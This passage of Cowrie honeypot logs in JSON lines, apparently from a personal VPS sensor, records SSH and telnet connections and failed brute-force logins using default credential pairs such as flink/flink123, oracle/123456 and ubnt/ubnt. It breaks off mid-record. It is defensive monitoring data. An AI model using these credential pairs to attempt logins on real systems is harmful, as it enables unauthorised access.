{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:56:18.136072Z","src_ip":"212.227.125.160","session":"9620cd097471"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink123","message":"login attempt [flink/flink123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:56:18.510950Z","src_ip":"212.227.125.160","session":"9620cd097471"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:56:19.618248Z","src_ip":"212.227.125.160","session":"9620cd097471"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34160,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5c8f1215fdc","protocol":"ssh","message":"New connection: 212.227.235.229:34160 (1.2.3.4:22) [session: a5c8f1215fdc]","sensor":"my-vps","timestamp":"2025-08-28T05:56:24.392760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:56:24.393625Z","src_ip":"212.227.235.229","session":"a5c8f1215fdc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:56:24.538325Z","src_ip":"212.227.235.229","session":"a5c8f1215fdc"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink123","message":"login attempt [flink/flink123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:56:24.986914Z","src_ip":"212.227.235.229","session":"a5c8f1215fdc"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:56:26.133596Z","src_ip":"212.227.235.229","session":"a5c8f1215fdc"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":49622,"dst_ip":"1.2.3.4","dst_port":23,"session":"6ad6378841c2","protocol":"telnet","message":"New connection: 8.222.212.69:49622 (1.2.3.4:23) [session: 6ad6378841c2]","sensor":"my-vps","timestamp":"2025-08-28T05:56:29.617139Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41554,"dst_ip":"1.2.3.4","dst_port":22,"session":"423adbc86603","protocol":"ssh","message":"New connection: 212.227.125.160:41554 (1.2.3.4:22) [session: 423adbc86603]","sensor":"my-vps","timestamp":"2025-08-28T05:56:32.265843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:56:32.273590Z","src_ip":"212.227.125.160","session":"423adbc86603"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:56:32.380878Z","src_ip":"212.227.125.160","session":"423adbc86603"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-28T05:56:32.787448Z","src_ip":"212.227.125.160","session":"423adbc86603"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:56:33.893186Z","src_ip":"212.227.125.160","session":"423adbc86603"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53240,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfb9727b784b","protocol":"ssh","message":"New connection: 212.227.235.229:53240 (1.2.3.4:22) [session: dfb9727b784b]","sensor":"my-vps","timestamp":"2025-08-28T05:56:46.705738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:56:46.707629Z","src_ip":"212.227.235.229","session":"dfb9727b784b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48936,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d8057033f1a","protocol":"ssh","message":"New connection: 212.227.125.160:48936 (1.2.3.4:22) [session: 0d8057033f1a]","sensor":"my-vps","timestamp":"2025-08-28T05:56:46.842728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:56:46.852879Z","src_ip":"212.227.125.160","session":"0d8057033f1a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:56:46.867062Z","src_ip":"212.227.235.229","session":"dfb9727b784b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:56:46.948869Z","src_ip":"212.227.125.160","session":"0d8057033f1a"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-28T05:56:47.305552Z","src_ip":"212.227.235.229","session":"dfb9727b784b"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123456","message":"login attempt [es/es123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:56:47.366979Z","src_ip":"212.227.125.160","session":"0d8057033f1a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:56:48.473524Z","src_ip":"212.227.125.160","session":"0d8057033f1a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:56:48.476042Z","src_ip":"212.227.235.229","session":"dfb9727b784b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37660,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6dac1078800","protocol":"ssh","message":"New connection: 212.227.235.229:37660 (1.2.3.4:22) [session: f6dac1078800]","sensor":"my-vps","timestamp":"2025-08-28T05:56:54.147874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:56:54.148787Z","src_ip":"212.227.235.229","session":"f6dac1078800"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:56:54.292597Z","src_ip":"212.227.235.229","session":"f6dac1078800"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123456","message":"login attempt [es/es123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:56:54.726027Z","src_ip":"212.227.235.229","session":"f6dac1078800"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:56:55.873292Z","src_ip":"212.227.235.229","session":"f6dac1078800"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60002,"dst_ip":"1.2.3.4","dst_port":23,"session":"3c304cc1f644","protocol":"telnet","message":"New connection: 212.227.235.229:60002 (1.2.3.4:23) [session: 3c304cc1f644]","sensor":"my-vps","timestamp":"2025-08-28T05:56:58.089792Z"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":60394,"dst_ip":"1.2.3.4","dst_port":23,"session":"e7a49e4c404b","protocol":"telnet","message":"New connection: 8.222.212.69:60394 (1.2.3.4:23) [session: e7a49e4c404b]","sensor":"my-vps","timestamp":"2025-08-28T05:57:00.281387Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41042,"dst_ip":"1.2.3.4","dst_port":22,"session":"537fd482c95d","protocol":"ssh","message":"New connection: 212.227.125.160:41042 (1.2.3.4:22) [session: 537fd482c95d]","sensor":"my-vps","timestamp":"2025-08-28T05:57:01.717674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:57:01.722127Z","src_ip":"212.227.125.160","session":"537fd482c95d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:57:01.848142Z","src_ip":"212.227.125.160","session":"537fd482c95d"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:57:02.236651Z","src_ip":"212.227.125.160","session":"537fd482c95d"}
{"eventid":"cowrie.session.closed","duration":32.81880211830139,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:57:02.435871Z","src_ip":"8.222.212.69","session":"6ad6378841c2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:57:03.345457Z","src_ip":"212.227.125.160","session":"537fd482c95d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:57:13.711156Z","src_ip":"212.227.125.160","session":"c565271214fb"}
{"eventid":"cowrie.session.closed","duration":180.18839645385742,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:57:13.715863Z","src_ip":"212.227.125.160","session":"c565271214fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38222,"dst_ip":"1.2.3.4","dst_port":22,"session":"53128252569d","protocol":"ssh","message":"New connection: 212.227.125.160:38222 (1.2.3.4:22) [session: 53128252569d]","sensor":"my-vps","timestamp":"2025-08-28T05:57:19.374755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:57:19.375640Z","src_ip":"212.227.125.160","session":"53128252569d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:57:19.480426Z","src_ip":"212.227.125.160","session":"53128252569d"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T05:57:19.796715Z","src_ip":"212.227.125.160","session":"53128252569d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:57:20.903579Z","src_ip":"212.227.125.160","session":"53128252569d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53526,"dst_ip":"1.2.3.4","dst_port":22,"session":"34e6161665ba","protocol":"ssh","message":"New connection: 212.227.235.229:53526 (1.2.3.4:22) [session: 34e6161665ba]","sensor":"my-vps","timestamp":"2025-08-28T05:57:23.731373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:57:23.732282Z","src_ip":"212.227.235.229","session":"34e6161665ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:57:23.876256Z","src_ip":"212.227.235.229","session":"34e6161665ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36820,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b82021bb665","protocol":"ssh","message":"New connection: 212.227.235.229:36820 (1.2.3.4:22) [session: 3b82021bb665]","sensor":"my-vps","timestamp":"2025-08-28T05:57:24.081713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:57:24.082547Z","src_ip":"212.227.235.229","session":"3b82021bb665"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"